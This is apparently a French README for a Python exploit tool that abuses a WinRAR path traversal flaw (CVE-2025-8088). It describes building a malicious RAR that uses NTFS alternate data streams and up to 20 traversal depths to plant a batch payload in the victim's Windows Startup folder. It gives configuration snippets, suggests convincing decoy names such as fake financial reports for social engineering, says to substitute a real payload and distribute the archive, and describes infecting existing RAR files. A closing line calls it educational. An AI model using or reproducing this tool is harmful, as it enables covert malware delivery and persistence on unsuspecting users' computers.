
Exploitez des systèmes utilisant une version plus ancienne de WinRAR sans connaître leur nom d'utilisateur (contrairement à d'autres projets)


Ce script Python exploite une vulnérabilité de traversée de chemin (CVE-2025-8088) dans WinRAR pour déployer des charges utiles dans le dossier de démarrage Windows en utilisant plusieurs profondeurs de chemin relatif. L'exploit crée une archive RAR malveillante qui, une fois extraite, écrit les charges utiles dans le dossier de démarrage de la victime à différentes profondeurs de répertoire.
Le script crée plusieurs fichiers leurres (20 par défaut), chacun configuré pour traverser un nombre différent de répertoires parents :
NUM_DEPTHS = 20 # Number of different traversal depths
Chaque fichier utilise une profondeur de chemin différente :
File1.txt → ..\Startup\payload.bat
File2.txt → ..\..\Startup\payload.bat
...
File20.txt → ..\..\..\ (20 fois) \Startup\payload.bat
✅ Garantit que, où que la victime extraie l'archive (Bureau, Documents, Téléchargements ou dossiers imbriqués), au moins une charge utile atteindra le dossier de démarrage.
Les fichiers leurres contiennent par défaut du texte générique, mais doivent être personnalisés pour un ingénierie sociale réaliste :
# Create more convincing decoy content
decoy.write_text("Quarterly Financial Report Q3 2025.docx\n", encoding="utf-8")
Pourquoi changer le contenu des leurres ?
La charge utile est un simple script batch par défaut, mais peut être remplacée par n'importe quel exécutable :
PAYLOAD = "@echo off\necho Payload executed!\npause\n"
Emplacement de la charge utile :
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.bat
L'archive RAR malveillante finale est enregistrée sous :
OUT_RAR = "exploit.rar"
Cette génération d'exploit nécessite un environnement Windows pour plusieurs raisons :
Dépendance aux flux de données alternatifs (ADS)
Fonctionnalité exclusive à NTFS utilisée pour attacher les charges utiles :
ads_path = f"{decoy}:{placeholder}" # Windows-specific NTFS syntax
Exigence d'exécutable WinRAR
Utilise l'interface en ligne de commande Windows de WinRAR :
subprocess.run(f'"{rar_exe}" a -ep -os "{base_rar}" ...')
Compatibilité de structure de chemins
Cible des chemins propres à Windows :
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu..."
Exécution de la charge utile
Génère des fichiers batch Windows :
@echo off
start /B notepad.exe
Personnalisez la configuration :
# Configuration
NUM_DEPTHS = 20
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B notepad.exe\n" # Your actual payload
DECOY_FILE_PREFIX = "Financial_Report_Q3_" # More convincing names
Exécutez le script :
python CVE-2025-8088.py
Distribuez le fichier de sortie :
exploit.rarCette version du code vous permet simplement d'exécuter quelque chose comme
python3 infect_premade_rarfiles.py website_backup.rar
Il extrait tous les fichiers, injecte ceux qu'il peut (comme .txt, .srt, .sql – tous les types de fichiers ne fonctionnent pas) puis crée le fichier RAR prêt à être exécuté.
⚠️ Cet outil est destiné uniquement à des fins éducatives et de recherche en sécurité.
Ne l'utilisez jamais contre des systèmes sans autorisation explicite. Toute utilisation non autorisée est illégale et contraire à l'éthique.